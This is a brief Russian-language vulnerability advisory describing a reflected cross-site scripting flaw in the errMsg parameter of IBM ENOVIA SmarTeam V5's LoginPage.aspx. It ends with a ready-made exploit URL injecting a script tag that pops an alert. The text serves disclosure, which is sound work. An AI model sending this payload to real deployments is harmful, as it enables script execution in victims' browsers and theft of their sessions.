Программа: IBM ENOVIA SmarTeam V5

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "errMsg" сценарием WebEditor/Authentication/LoginPage.aspx.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Эксплоит:

http://example.com/WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2fWebEditor%2f Default.aspx&errMsg=User+is+locked.+Too+many+ logon+attempts."><script>alert(‘XSS-By-Lament’)</script>



Оставить мнение